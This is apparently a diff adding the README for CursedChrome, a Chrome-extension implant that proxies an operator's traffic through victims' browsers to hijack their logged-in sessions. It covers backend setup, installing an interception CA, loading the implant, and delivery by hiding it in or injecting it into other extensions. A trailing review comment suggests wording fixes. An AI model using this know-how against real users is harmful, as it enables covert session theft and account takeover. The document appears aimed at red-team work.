| 1 | +# CursedChrome |
| 2 | + |
| 3 | +## What is it? |
| 4 | +A ([cursed](https://knowyourmeme.com/memes/cursed-image)) Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies. By using the proxies this tool creates you can browse the web authenticated as your victim for all of their websites. |
| 5 | + |
| 6 | +More and more companies are moving toward the ["BeyondCorp"](https://en.wikipedia.org/wiki/BeyondCorp) model (e.g. no flat internal network, zero trust everything). This is usually implemented via a [reverse proxy/OAuth wall](https://github.com/bitly/oauth2_proxy) gating access to services, eliminating the need for a VPN. With more and more access becoming strictly available via the web browser, having a way to easily hijack and use victim's web sessions becomes an ever increasing necessity. |
| 7 | + |
| 8 | +This is especially useful for locked down orgs that make use of [Chrome OS](https://en.wikipedia.org/wiki/Chrome_OS) where traditional malware can't be used at all. It's also steathy, as all requests will have the appropriate source-IP, cookies, client-certificates, etc since it's being proxying directly through the victim's browser. |
| 9 | + |
| 10 | +## Screenshots |
| 11 | + |
| 12 | +### Web Admin Panel |
| 13 | + |
| 14 | + |
| 15 | +### Browsing Websites Logged In as Victim (using Firefox with HTTP Proxy) |
| 16 | + |
| 17 | + |
| 18 | +## (Rough) Infrastructure Diagram (`docker-compose` Used) |
| 19 | + |
| 20 | + |
| 21 | + |
| 22 | +### Ports & Listening Interfaces |
| 23 | + |
| 24 | +- `127.0.0.1:8080`: HTTP proxy server (using one of the credentials in the admin panel, you can auth to a specific victim's Chrome browser via this HTTP proxy server). You also need to install the generated CA available via the admin panel before using this. |
| 25 | +- `127.0.0.1:4343`: Websocket server, used for communicating with victim Chrome instances to transfer HTTP requests for proxying and sending commands. |
| 26 | +- `127.0.0.1:8118`: Admin web panel for viewing victim Chrome instances and getting HTTP proxy credentials. |
| 27 | + |
| 28 | + |
| 29 | +## Requirements |
| 30 | + |
| 31 | +* [`docker`](https://docs.docker.com/get-docker/) and [`docker-compose`](https://docs.docker.com/compose/install/) |
| 32 | +* Chrome web browser |
| 33 | + |
| 34 | +## Setting Up the Backend |
| 35 | + |
| 36 | +The backend is entirely dockerized and can be setup by running the following commands: |
| 37 | + |
| 38 | +``` |
| 39 | +cd cursedchrome/ |
| 40 | +# Start up redis and Postgres containers in the background |
| 41 | +docker-compose up -d redis db |
| 42 | +# Start the CursedChrome backend |
| 43 | +docker-compose up cursedchrome |
| 44 | +``` |
| 45 | + |
| 46 | +Once you start up the backend you'll see an admin username and password printed to the console. You can log into the admin panel at `http://localhost:8118` using these credentials (you will be prompted to change your password upon logging in since the one printed to the console is likely logged). |
| 47 | + |
| 48 | +## Installing the CursedChrome CA for Proxying HTTPS |
| 49 | + |
| 50 | +Once you have the backend setup, log in to the admin panel at `http://localhost:8118` (see above) and click the `Download HTTPS Proxy CA Certificate` button. This will download the generated CA file which is required in order to proxy HTTPS requests. |
| 51 | + |
| 52 | +You will need to install this CA into your root store, the following are instructions for various OS/browsers: |
| 53 | + |
| 54 | +* [OS X/Mac](https://www.sslsupportdesk.com/how-to-import-a-certificate-into-mac-os/) |
| 55 | +* [Windows](https://www.sslsupportdesk.com/how-to-enable-or-disable-all-puposes-of-root-certificates-in-mmc/) |
| 56 | +* [Linux](https://thomas-leister.de/en/how-to-import-ca-root-certificate/) |
| 57 | +* [Firefox (any OS)](https://support.securly.com/hc/en-us/articles/360008547993-How-to-Install-Securly-s-SSL-Certificate-in-Firefox-on-Windows) |
| 58 | + |
| 59 | +## Setting Up the Example Chrome Extension Implant |
| 60 | + |
| 61 | +To install the example chrome extension implant, do the following: |
| 62 | + |
| 63 | +* Open up a Chrome web browser and navigate to `chrome://extensions`. |
| 64 | +* Click the toggle in the top-right corner of the page labeled `Developer mode` to enable it. |
| 65 | +* Click the `Load unpacked` button in the top-left corner of the page. |
| 66 | +* Open the `extension/` folder inside of this repo folder. |
| 67 | +* Once you've done so, the extension will be installed. |
| 68 | + |
| 69 | +*Note:* You can debug the implant by clicking on the `background page` link for the text `Inspect views background page` under the `CursedChrome Implant` extension. |
| 70 | + |
| 71 | +After you've install the extension it will show up on the admin control panel at `http://localhost:8118`. |
| 72 | + |
| 73 | +## Modifying Implant Extension |
| 74 | + |
| 75 | +An example implant extension has been included under the `extension/` folder. This extension has the `extension/src/bg/background.js` file which has the extension-side of the implant that connects to the service via WebSocket to proxy requests through the victim's web browser. |
| 76 | + |
| 77 | +The following [extension permissions](https://developer.chrome.com/extensions/api_index) are needed by the implant to operate: |
| 78 | + |
| 79 | +``` |
| 80 | +"permissions": [ |
| 81 | + "webRequest", |
| 82 | + "webRequestBlocking", |
| 83 | + "<all_urls>" |
| 84 | +] |
| 85 | +``` |
| 86 | + |
| 87 | +This code contains comments on how to modify it for a production setup. Basically doing the following: |
| 88 | + |
| 89 | +* Minifying/stripping/uglifying the JavaScript code |
| 90 | +* Modifying the WebSocket connection URI in the `initialize()` function to point to the host you've set up the backend on. By default it's set to `ws://localhost:4343` which will work with the out-of-the-box dev setup described in this README. |
| 91 | + |
| 92 | +In a real world attack, this extension code would be used in one of the following ways: |
| 93 | + |
| 94 | +* Injected into an existing extension with proper permissions via Chrome debugging protocol. |
| 95 | +* Hidden inside of another extension |
| 96 | +* Force-installed via Chrome enterprise policy |
| 97 | + |
| 98 | +These topics are outside of the scope of this README, but eventually will be covered separately. |
| 99 | + |
| 100 | +## Notes on Production Deployments |
| 101 | + |
| 102 | +* You will likely want to run an Nginx server with a valid HTTPS certificate doing a `proxy_pass` to the WebSocket server (running on `127.0.0.1:4343`). Then you'll have TLS-encrypted websocket traffic. |
| 103 | +* For a more secure setup, don't expose the HTTP proxy & and admin panel to the Internet directly. Opt for SSL port-forwarding or using a bastion server to connect to it. |
| 104 | +* For situations with a large number of victims/bots/implants running, you can horizontally scale out the CursedChrome server as wide as you need to. The socket handling is completely decoupled via `redis`, so it can suppose (theoretically) tens of thousands of concurrent clients. |
| 105 | + |
| 106 | +## Attributions |
| 107 | + |
| 108 | +* The icon used for the web panel favicon and the example Chrome implant extension is provided by Freepik from `www.flaticon.com`. |
| 109 | +* The [AnyProxy source code](https://github.com/alibaba/anyproxy) was heavily modified and used for part of this project. |
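Review bot: "Notes on Production Deployments" has a garbled sentence that also names the wrong mechanism: `don't expose the HTTP proxy & and admin panel to the Internet directly. Opt for SSL port-forwarding or using a bastion server` should drop the stray `&` and, given the bastion advice and the `127.0.0.1` binds listed under "Ports & Listening Interfaces", read "SSH port-forwarding". In the same section `it can suppose (theoretically) tens of thousands` should be `support`. Under "What is it?", `It's also steathy, as all requests will have the appropriate source-IP, cookies, client-certificates, etc since it's being proxying directly through the victim's browser` should read "stealthy" and "since they are being proxied", and `hijack and use victim's web sessions` wants the plural possessive `victims'`. Under "Setting Up the Example Chrome Extension Implant", `After you've install the extension` should be `installed`. The "Screenshots" and "(Rough) Infrastructure Diagram" headings have no image references beneath them, so those sections render empty; add the image links or drop the headings until they exist. The "Ports & Listening Interfaces" entry for `127.0.0.1:8080` says the CA must be installed "before using this", while "Installing the CursedChrome CA for Proxying HTTPS" says it is only required for HTTPS; align the first with the second ("required for proxying HTTPS"). Because that generated CA lets the proxy present a certificate for any HTTPS host the operator visits through it, the install section should steer operators toward a dedicated browser profile (the Firefox-only route is already in the list) rather than the OS root store of a daily-use machine. Finally, the permissions block under "Modifying Implant Extension" is a `manifest.json` fragment; tag its fence with `json` so it highlights and is recognisably part of the manifest.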